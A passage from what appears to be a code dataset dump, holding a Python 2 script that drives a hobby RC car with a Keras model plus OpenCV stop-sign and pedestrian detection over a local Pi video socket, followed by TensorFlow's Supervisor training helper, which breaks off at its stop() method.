source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
autonomous_v6.py
|
import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
dir_log = []
SIGMA = 0.33
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign_pjy.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(100)
car.pause(300)
dir_log.append('Forward')
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
dir_log.append('Left')
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
dir_log.append('Right')
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(45, 45))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for predestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
# THIS IS A BUST. Supposed to check if car was stuck.
# See version 7, which attempts to check for signal in lower Left and Right corners of each image. If that works, "am i stuck" mode would be moot.
class DifferenceDetector(object):
global dir_log
def __init__(self):
self.previous_img = None
self.thresh = 100 # some value between 0-255.
self.ctrlz_thresh = 0.05 # e.g. if consecutive images are < 5% different (i.e. 95% the same), then activate ctrl-z mode.
self.ctrlz_iter = 10
self.difference = None
def compare(self, current_img):
# First time.
if self.previous_img is None:
self.previous_img = current_img
# All subsequent.
# cv2.threshold 'activates' (turns white) only those pixels that meet a certain threshold requirement. Everything below that is black.
# 'difference' shows the difference between two images, only showing those pixels that meet/exceed the threshold that was set.
diff = cv2.threshold(np.abs(cv2.subtract(self.previous_img, current_img)), self.thresh, 255, cv2.THRESH_BINARY)[1]
self.previous_img = current_img
self.difference = diff
return diff
def make_decision(self):
# Calculate the percent_difference to decide whether to act on 'difference'
print 'make_decision1'
calc_difference = np.sum(self.difference)
max_difference = np.sum(255 * self.difference.shape)
percent_difference = float(calc_difference) / max_difference
print 'make_decision2'
# If percent_difference is below ctrlz_thresh (i.e. the two images are < 5% different), then commence ctrl-z protocol.
if percent_difference <= self.ctrlz_thresh:
# Activate ctrl-z mode
print '< < < CTRL-Z MODE ACTIVATED! > > >'
# Get the last 10 directions executed from the log (or however many you specified for self.ctrlz_iter)
recent_dirs = dir_log[ -self.ctrlz_iter : ]
recent_dirs_reversed = recent_dirs.reverse()
for each in recent_dirs_reversed:
# Forward -> Reverse
if each == 'Forward':
car.reverse(100)
car.pause(300)
print '< REVERSE >'
# Left -> Right
elif each == 'Left':
car.right(300)
car.reverse_right(200)
car.right(700)
car.pause(200)
print '< REVERSE-RIGHT >'
# FORWARD-RIGHT
elif each == 'Right':
car.left(300)
car.reverse_left(200)
car.left(700)
car.pause(200)
print '< REVERSE-LEFT >'
diff_detect = DifferenceDetector()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
print 'good NeuralNetwork_init'
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
print 'good fetch1'
while self.receiving:
print 'good fetch2'
# There's a chance that the Main thread can get to this point before the New thread begins streaming images.
# To account for this, we create the jpg variable but set to None, and keep checking until it actually has something.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
print 'good fetch3'
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
print 'good fetch4'
# Object detection
obj_detection.detect(stop_classifier, gray, image)
print 'good fetch5'
# Compare current and previous images to deduce whether car is stuck (not moving)
diff_detect.compare(gray)
diff_detect.make_decision()
print 'good fetch6'
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GuassianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# Neural network model makes prediciton
# prediction = self.model.predict(auto)
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
self.server_socket.bind(('10.10.10.2', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
print 'Listening...'
self.server_socket.listen(0)
# Accept a single connection ('rb' is 'read binary')
self.connection = self.server_socket.accept()[0].makefile('rb')
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.connection.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
if __name__ == '__main__':
try:
# Create an instance of PiVideoStream class
video_stream = PiVideoStream()
except (KeyboardInterrupt):
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating\n'
car.pause(10000)
video_stream.stop()
print '\n! Received keyboard interrupt, quitting threads.\n'
finally:
video_stream.connection.close()
print '...done.\n'
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python import summary as _summary
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific , and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`, the
model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.local_variables_initializer(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
